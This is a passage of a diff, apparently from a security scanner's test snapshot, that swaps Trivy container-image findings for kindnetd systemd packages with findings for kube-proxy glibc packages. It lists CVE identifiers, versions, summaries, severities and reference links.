'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010023", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", + "references": [ + "http://www.securityfocus.com/bid/109167", + "https://access.redhat.com/security/cve/CVE-2019-1010023", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010023", + "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1794.html", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "http://www.securityfocus.com/bid/109167", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5JXQAKSTMABZ46EVCRMW62DHWYHTTFES/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-3843", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190619-0002/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4269-1", + "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4269-1/", + "value": "https://ubuntu.com/security/CVE-2019-1010023", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-3843", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-3844", - "installedVersion": "241-7~deb10u5", - "packageName": "libudev1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010024", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", "references": [ - "http://www.securityfocus.com/bid/108096", - "https://access.redhat.com/security/cve/CVE-2019-3844", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3844", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3844", - "https://linux.oracle.com/cve/CVE-2019-3844.html", - "https://linux.oracle.com/errata/ELSA-2020-1794.html", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2019-3844", - "https://security.netapp.com/advisory/ntap-20190619-0002/", - "https://ubuntu.com/security/notices/USN-4269-1", - "https://usn.ubuntu.com/4269-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-3844", + "http://www.securityfocus.com/bid/109162", + "https://access.redhat.com/security/cve/CVE-2019-1010024", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010024", + "https://www.cve.org/CVERecord?id=CVE-2019-1010024", ], }, "category": "Vulnerability", - "description": "It was discovered that a systemd service that uses DynamicUser property can get new privileges through the execution of SUID binaries, which would allow to create binaries owned by the service transient group with the setgid bit set. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the GID will be recycled.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "systemd: services with DynamicUser can get new privileges and create SGID binaries", + "name": "glibc: ASLR bypass using cache of thread stack and heap", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-3844", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/108096", + "value": "http://www.securityfocus.com/bid/109162", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-3844", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3844", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3844", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-3844.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1794.html", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://ubuntu.com/security/CVE-2019-1010024", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-3844", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010025", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-1010025", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010025", + "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: information disclosure of heap addresses of pthread_created thread", + "references": [ { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190619-0002/", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4269-1", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4269-1/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-3844", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "241-7~deb10u9", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-26604", - "installedVersion": "241-7~deb10u5", - "packageName": "libudev1", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-26604", - "https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-2-insecure-functionality/", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26604", - "https://github.com/systemd/systemd/blob/main/NEWS#L4335-L4340", - "https://github.com/systemd/systemd/issues/5666", - "https://lists.debian.org/debian-lts-announce/2023/03/msg00032.html", - "https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7", - "https://nvd.nist.gov/vuln/detail/CVE-2023-26604", - "https://security.netapp.com/advisory/ntap-20230505-0009/", - "https://www.cve.org/CVERecord?id=CVE-2023-26604", - ], - }, - "category": "Vulnerability", - "description": "systemd before 247 does not adequately block local privilege escalation for some Sudo configurations, e.g., plausible sudoers files in which the "systemctl status" command may be executed. Specifically, systemd does not set LESSSECURE to 1, and thus other programs may be launched from the less program. This presents a substantial security risk when running systemctl from Sudo, because less executes as root when the terminal size is too small to show the complete systemctl output.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "privilege escalation via the less pager", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-26604", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-26604", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-2-insecure-functionality/", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26604", + "value": "https://ubuntu.com/security/CVE-2019-1010025", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/blob/main/NEWS#L4335-L4340", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-9192", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-9192", + "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2019-9192", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "references": [ { "type": "URL", - "value": "https://github.com/systemd/systemd/issues/5666", + "value": "https://avd.aquasec.com/nvd/cve-2019-9192", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00032.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-9192", }, { "type": "URL", - "value": "https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-26604", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230505-0009/", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-26604", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "241-7~deb10u8", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-33910", - "installedVersion": "241-7~deb10u5", - "packageName": "libudev1", + "fixedVersion": "2.31-13+deb11u4", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3999", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", "references": [ - "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html", - "http://www.openwall.com/lists/oss-security/2021/08/04/2", - "http://www.openwall.com/lists/oss-security/2021/08/17/3", - "http://www.openwall.com/lists/oss-security/2021/09/07/3", - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33910.json", - "https://access.redhat.com/security/cve/CVE-2021-33910", - "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33910", - "https://github.com/systemd/systemd-stable/commit/4a1c5f34bd3e1daed4490e9d97918e504d19733b", - "https://github.com/systemd/systemd-stable/commit/764b74113e36ac5219a4b82a05f311b5a92136ce", - "https://github.com/systemd/systemd-stable/commit/b00674347337b7531c92fdb65590ab253bb57538", - "https://github.com/systemd/systemd-stable/commit/cfd14c65374027b34dbbc4f0551456c5dc2d1f61", - "https://github.com/systemd/systemd/commit/b34a4f0e6729de292cb3b0c03c1d48f246ad896b", - "https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9", - "https://linux.oracle.com/cve/CVE-2021-33910.html", - "https://linux.oracle.com/errata/ELSA-2021-2717.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2LSDMHAKI4LGFOCSPXNVVSEWQFAVFWR7/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-33910", - "https://security.gentoo.org/glsa/202107-48", - "https://security.netapp.com/advisory/ntap-20211104-0008/", - "https://ubuntu.com/security/notices/USN-5013-1", - "https://ubuntu.com/security/notices/USN-5013-2", - "https://www.cve.org/CVERecord?id=CVE-2021-33910", - "https://www.debian.org/security/2021/dsa-4942", - "https://www.openwall.com/lists/oss-security/2021/07/20/2", - "https://www.qualys.com/2021/07/20/cve-2021-33910/denial-of-service-systemd.txt", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", + "https://access.redhat.com/security/cve/CVE-2021-3999", + "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "https://linux.oracle.com/cve/CVE-2021-3999.html", + "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "https://security.netapp.com/advisory/ntap-20221104-0001/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "https://www.openwall.com/lists/oss-security/2022/01/24/4", ], }, "category": "Vulnerability", - "description": "basic/unit-name.c in systemd prior to 246.15, 247.8, 248.5, and 249.1 has a Memory Allocation with an Excessive Size Value (involving strdupa and alloca for a pathname controlled by a local attacker) that results in an operating system crash.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "systemd: uncontrolled allocation on the stack in function unit_name_path_escape leads to crash", + "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-33910", - }, - { - "type": "URL", - "value": "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "value": "https://avd.aquasec.com/nvd/cve-2021-3999", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "value": "https://access.redhat.com/security/cve/CVE-2021-3999", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33910.json", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-33910", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf", + "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33910", + "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/commit/4a1c5f34bd3e1daed4490e9d97918e504d19733b", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/commit/764b74113e36ac5219a4b82a05f311b5a92136ce", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/commit/b00674347337b7531c92fdb65590ab253bb57538", + "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/commit/cfd14c65374027b34dbbc4f0551456c5dc2d1f61", + "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b34a4f0e6729de292cb3b0c03c1d48f246ad896b", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-33910.html", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-2717.html", + "value": "https://ubuntu.com/security/notices/USN-5310-2", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2LSDMHAKI4LGFOCSPXNVVSEWQFAVFWR7/", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2010-4756", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", + "references": [ + "http://cxib.net/stuff/glob-0day.c", + "http://securityreason.com/achievement_securityalert/89", + "http://securityreason.com/exploitalert/9223", + "https://access.redhat.com/security/cve/CVE-2010-4756", + "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "https://www.cve.org/CVERecord?id=CVE-2010-4756", + ], + }, + "category": "Vulnerability", + "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33910", + "value": "https://avd.aquasec.com/nvd/cve-2010-4756", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-48", + "value": "http://cxib.net/stuff/glob-0day.c", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211104-0008/", + "value": "http://securityreason.com/achievement_securityalert/89", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-1", + "value": "http://securityreason.com/exploitalert/9223", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-2", + "value": "https://access.redhat.com/security/cve/CVE-2010-4756", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-33910", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4942", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2021/07/20/2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", }, { "type": "URL", - "value": "https://www.qualys.com/2021/07/20/cve-2021-33910/denial-of-service-systemd.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3997", - "installedVersion": "241-7~deb10u5", - "packageName": "libudev1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-20796", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-3997", - "https://bugzilla.redhat.com/show_bug.cgi?id=2024639", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3997", - "https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3997", - "https://security.gentoo.org/glsa/202305-15", - "https://ubuntu.com/security/notices/USN-5226-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3997", - "https://www.openwall.com/lists/oss-security/2022/01/10/2", + "http://www.securityfocus.com/bid/107160", + "https://access.redhat.com/security/cve/CVE-2018-20796", + "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "https://security.netapp.com/advisory/ntap-20190315-0002/", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2018-20796", ], }, "category": "Vulnerability", - "description": "A flaw was found in systemd. An uncontrolled recursion in systemd-tmpfiles may lead to a denial of service at boot time when too many nested directories are created in /tmp.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "systemd: Uncontrolled recursion in systemd-tmpfiles when removing files", + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3997", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3997", + "value": "https://avd.aquasec.com/nvd/cve-2018-20796", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024639", + "value": "http://www.securityfocus.com/bid/107160", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3997", + "value": "https://access.redhat.com/security/cve/CVE-2018-20796", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1", + "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3997", + "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202305-15", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5226-1", + "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3997", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/01/10/2", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-3821", - "installedVersion": "241-7~deb10u5", - "packageName": "libudev1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010022", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0336", - "https://access.redhat.com/security/cve/CVE-2022-3821", - "https://bugzilla.redhat.com/2139327", - "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", - "https://errata.almalinux.org/9/ALSA-2023-0336.html", - "https://errata.rockylinux.org/RLSA-2023:0336", - "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", - "https://github.com/systemd/systemd/issues/23928", - "https://github.com/systemd/systemd/pull/23933", - "https://linux.oracle.com/cve/CVE-2022-3821.html", - "https://linux.oracle.com/errata/ELSA-2023-0336.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", - "https://security.gentoo.org/glsa/202305-15", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-3821", + "https://access.redhat.com/security/cve/CVE-2019-1010022", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "https://ubuntu.com/security/CVE-2019-1010022", + "https://www.cve.org/CVERecord?id=CVE-2019-1010022", ], }, "category": "Vulnerability", - "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to 